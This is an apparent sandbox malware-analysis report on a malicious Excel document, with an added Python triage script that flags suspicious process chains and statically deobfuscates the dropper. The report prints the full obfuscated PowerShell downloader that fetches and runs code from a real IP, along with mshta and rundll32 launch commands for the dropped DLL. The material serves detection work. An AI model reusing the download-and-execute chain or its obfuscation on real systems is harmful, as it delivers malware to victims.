Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",RPzUMBQVQiRJfbr Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Gjesjojdky\tnenolnsbc.zlf",DllRegisterServer Jump to behavior
Source: Yara match File source: DOCUMENT_2801.xls, type: SAMPLE
Source: Yara match File source: C:\Users\user\Desktop\DOCUMENT_2801.xls, type: DROPPED
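
The process-creation lines above give the whole delivery chain. EXCEL.EXE stages `mshta http://91.240.118.172/ee/ss/se.html` in an environment variable and echoes it into a child `cmd` whose own command line is just `cmd` (the command arrives on stdin, which is what the "passes commands via pipe to a shell" signature refers to), mshta.exe spawns powershell.exe with a downloader obfuscated through `.replace('{FutuReD}', '')` and `-Join ''`, powershell.exe writes C:\ProgramData\Milossd.dll and runs it through rundll32.exe, and rundll32.exe re-launches the copy placed under C:\Windows\SysWOW64\Hzcvqvi\ with a `.tpx` extension. The script below is an added example and not part of the report: it replays those command lines (constructed from the listing above; nothing is executed) through a small triage routine that flags each suspicious parent/child pair, the stdin-piped cmd, and the rundll32 module that is not a .dll, and statically undoes the replace/-Join obfuscation to recover the downloader the final pair of IEX calls fetched and ran. The rule names, the event tuple layout and the function names are my own, not the sandbox's.

```python
import re

# Constructed sample input: (parent image, child image, child command line) for
# each "Process created" line in the report. Command lines are copied as the
# report prints them; the PowerShell one is the line mshta.exe spawned.
PS_EXE = r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'
PS_CMDLINE = (
    PS_EXE + r""" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); """
    r"""$c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); """
    r"""$c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');"""
    r"""$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X"""
)
EVENTS = [
    ("EXCEL.EXE", "cmd.exe", "cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd"),
    ("cmd.exe", "cmd.exe", r'C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "'),
    ("cmd.exe", "cmd.exe", "cmd"),
    ("cmd.exe", "mshta.exe", "mshta http://91.240.118.172/ee/ss/se.html"),
    ("mshta.exe", "powershell.exe", PS_CMDLINE),
    ("powershell.exe", "cmd.exe", r'"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat'),
    ("cmd.exe", "rundll32.exe", r"C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat"),
    ("rundll32.exe", "rundll32.exe", r'C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer'),
    ("rundll32.exe", "rundll32.exe", r'C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP'),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}


def deobfuscate_replace_join(cmdline):
    """Statically undo the  $x='...'.replace('junk', '')  /  ($a,$b -Join '')
    pattern and return the PowerShell the trailing IEX would have executed.
    Pure string handling: the command line is never evaluated."""
    parts = {}
    for name, literal, junk in re.findall(
            r"\$(\w+)='((?:[^']|'')*)'\.replace\('([^']*)',\s*''\)", cmdline):
        # '' is PowerShell's escape for a single quote inside a '...' literal
        parts[name] = literal.replace(junk, "").replace("''", "'")
    join = re.search(r"\(((?:\$\w+,?)+)\s+-Join\s+''\)", cmdline)
    if not join:
        return None
    return "".join(parts[v.lstrip("$")] for v in join.group(1).split(","))


def rundll32_module(cmdline):
    """Module path rundll32 was asked to load (first token after rundll32.exe)."""
    m = re.search(r'rundll32\.exe\s+"?([^"\s,]+)', cmdline, re.I)
    return m.group(1) if m else None


def triage(events):
    """Return a list of (tag, detail) findings for (parent, child, cmdline) events."""
    findings = []
    for parent, child, cmdline in events:
        p, c, low = parent.lower(), child.lower(), cmdline.lower()
        if p in OFFICE_APPS and c in SCRIPT_HOSTS:
            findings.append(("office-spawns-shell", f"{parent} -> {child}"))
        if "echo %" in low and "| cmd" in low:
            findings.append(("cmd-stdin-pipe", "command staged in an env var and piped into cmd"))
        if p == "cmd.exe" and c == "cmd.exe" and low.strip() in {"cmd", "cmd.exe"}:
            findings.append(("cmd-no-args", "child cmd has an empty command line; input arrives on stdin"))
        if p == "mshta.exe" and c in {"powershell.exe", "cmd.exe"}:
            findings.append(("mshta-spawns-shell", child))
        if c == "powershell.exe" and ".replace(" in low and "-join" in low:
            plain = deobfuscate_replace_join(cmdline)
            if plain:
                findings.append(("ps-replace-join-obfuscation", plain))
                for url in re.findall(r"https?://[^\s'\")]+", plain):
                    findings.append(("payload-url", url))
        if c == "rundll32.exe":
            mod = rundll32_module(cmdline)
            if mod and not mod.lower().endswith(".dll"):
                findings.append(("rundll32-non-dll-module", mod))
            if mod and mod.lower().startswith("c:\\programdata\\"):
                findings.append(("rundll32-from-programdata", mod))
    return findings


if __name__ == "__main__":
    for tag, detail in triage(EVENTS):
        print(f"{tag:28} {detail}")
```

Two points the output makes that the raw listing does not: the third cmd.exe has nothing suspicious in its own command line, so a rule keyed only on the child's arguments misses it and the parent's `echo %ooo% | cmd` is what has to be matched; and the URL ending in .png returns PowerShell, not an image, which the second IEX runs, so the content-type of that response is a better block criterion than the extension.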

Language, Device and Operating System Detection

Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 11_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 11_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 11_2_10014B71
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA, 13_2_1003F570
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 13_2_10043730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA, 13_2_10014B71
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\hh.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003DAA7 cpuid 11_2_1003DAA7
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 11_2_1003906D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 11_2_1003CE1A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA, 11_2_100453C8

Stealing of Sensitive Information

Source: Yara match File source: 17.2.rundll32.exe.27d0000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.25b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3090000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f70000.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2880000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.880000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2db0000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2760000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.860000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a90000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2e10000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2db0000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e80000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7d0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.d80000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e50000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2eb0000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2900000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2db0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.29a0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2f70000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2800000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b30000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.e50000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.c20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.730000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2900000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.600000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2900000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.270000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.370000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2fc0000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.860000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2800000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.29a0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.2b0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.ce0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.880000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27d0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2e40000.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2800000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.27d0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2fc0000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e90000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b00000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.28d0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d50000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a90000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.28d0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2e40000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2eb0000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d80000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.830000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d10000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2730000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3030000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.810000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2cf0000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.270000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.3060000.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.7d0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2830000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d50000.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b60000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2b30000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2830000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2a10000.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.26d0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.26a0000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.ce0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2d10000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.8e0000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.1e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.2ee0000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.2400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.rundll32.exe.290000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.rundll32.exe.10000000.31.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.rundll32.exe.2db0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000002.664811796.0000000002D81000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559443936.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665343860.0000000003091000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559926602.0000000000E81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559812770.0000000000CE0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664505889.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562101992.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664861198.0000000002DB0000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664965956.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664542338.0000000002B61000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560189924.0000000002E11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559719503.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663059849.0000000000270000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665031499.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.668746611.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560022976.00000000025B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663136022.0000000000370000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664371125.0000000002A11000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664216814.0000000002800000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665264578.0000000003031000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560265506.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663107682.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559589643.0000000000291000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560140675.00000000029A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664407337.0000000002A90000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560066037.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664117517.00000000026D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664190998.00000000027D1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559766532.0000000000C21000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664248445.0000000002881000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665204361.0000000002FC0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664471765.0000000002B01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665308751.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664297781.0000000002900000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663687755.0000000000831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562204420.0000000000271000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664663684.0000000002D10000.00000040.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.663778840.0000000000860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664161641.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665168076.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.665088679.0000000002EE1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559961394.0000000002400000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.562837454.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559901253.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.560096641.0000000002901000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.559852842.0000000000D81000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.664763356.0000000002D50000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\Milossd.dll, type: DROPPED